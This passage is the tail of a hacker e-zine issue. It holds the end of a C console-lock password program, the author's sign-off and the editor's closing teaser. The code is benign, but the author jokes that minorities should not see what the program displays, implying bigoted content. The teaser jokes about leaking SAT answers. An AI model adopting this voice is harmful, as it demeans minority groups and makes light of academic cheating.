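        fflush(stdout);
        if (read_passwd(stdin, stored, sizeof stored) <= 0) {
            fprintf(stderr, "need 1 to %d characters\n", PASSWD_MAX - 1);
            return 1;
        }
    }
    for (;;) {
        printf("Password: ");
        fflush(stdout);
        if (read_passwd(stdin, typed, sizeof typed) >= 0 &&
            passwd_equal(typed, stored))
            break;
        if (feof(stdin))             /* input closed: give up instead of spinning */
            return 1;
    }
    puts("unlocked");
    return 0;
}
```
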
Anyways, the code is yours to edit. If there are any problems, mail me at comp4ct@hotmail.com

p.s. don't abuse getch. Hit Enter *ONE TIME* to get a password prompt.

NOTE: If you have any minorities in your office / household, i would not run this program in front of them. It may lock your console, but if they see whats popping up, you could be fired / flogged. But isn't that the b4b0 way?

Good Day,
cp4kt

Special thanks to: Matt Conover (Shok of w00w00) for his great article on console ioctls. The macros used to lock console were taken from there. Thank you.

-/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/-

Closing up..

WELP, THATS IT. Hope you enjoyed this totally k-sp1ff, extroidinarily diverse issue of BABO! Please send many submissions to us for b4b0 8.

submissions@b4b0.org | Comments and questions go to letters@b4b0.org

Your editor, ph1x.

######## ######## ######## ## ## ## ## ######## ## ## ######## ## ## ## ## ######## ######## ##

* IN THE NEXT EXCITING EPISODE OF B4B0, SAT AND ACT ANSWERS WILL BE GIVEN!
* NOT TO MENTION OUR COPY OF ALIEN AUTOPSY PORNAGRAPHY STARRING JONATHAN
* FRAKES WILL BE UUENCODED AND DISTRIBUTED. UNTIL THEN, STAY TUNED!